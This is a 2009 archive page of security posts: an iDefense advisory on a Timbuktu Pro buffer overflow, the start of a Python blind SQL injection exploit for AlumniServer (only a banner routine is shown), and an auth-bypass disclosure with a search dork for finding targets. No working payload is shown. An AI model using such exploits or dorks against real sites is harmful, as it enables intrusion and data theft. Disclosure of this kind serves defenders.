Home » 2009 » June » 26
iDefense Security Advisory 06.25.09: Motorola Timbuktu Pro PlughNTCommand Stack Based Buffer Overflow Vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 06.25.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jun 25, 2009

I. BACKGROUND

Motorola Inc.'s Timbuktu Pro is a remote control software that allows
remote access to a computer's desktop. It is available for Mac OS X and
Windows systems and provides integration with Skype and SSH. More
information is available on Motorola's web site at the following URL.

http://www.netopia.com/software/products/tb2/

II. DESCRIPTION

Remote exploitation of a stack-based buffer overflow vulnerability in
Motorola Inc.'s Timbuktu Pro could allow attackers to execute arbitrary
code with SYSTEM privileges.

Timbuktu fails to properly handle user-supplied data passed ... Read more »
Views: 14745 | Added by: apeh1706 | Date: 26 June 2009 | Comments (0)

(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->
#
#Used modules
import urllib2,sys,re,os
#Defined functions
def init():
       if(sys.platform=='win32'):
               os.system("cls")
               os.system ("title AlumniServer v-1.0.1 Blind SQL Injection Exploit")
               os.system ("color 02")
       else:
               os.system("clear")

       print "\t###########################
############################\n\n"
       print "\t#######################################################\n\n"
       print "\t##     AlumniServer v-1.0.1 Blind SQLi Exploit       ##\n\n"
      & ... Read more »
Views: 5741 | Added by: apeh1706 | Date: 26 June 2009 | Comments (0)

SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1-->
CMS INFORMATION:

-->WEB: http://www.alumniserver.net/
-->DOWNLOAD: http://www.alumniserver.net/
-->DEMO: N/A
-->CATEGORY: CMS/Education
-->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools
               and companies. Services for usersinclude profile page,...
-->RELEASED: 2009-06-11

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "AlumniServer project"
-->CATEGORY: AUTH-BYPASS (SQLi)
-->AFFECT VERSION: CURRENT
-->Discovered Bug date: 2009-06-16
-->Reported Bug date: 2009-06-16
-->Fixed bug date: N/A
-->Info patch (????): N/A
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia ... Read more »
Views: 1738 | Added by: apeh1706 | Date: 26 June 2009 | Comments (0)

close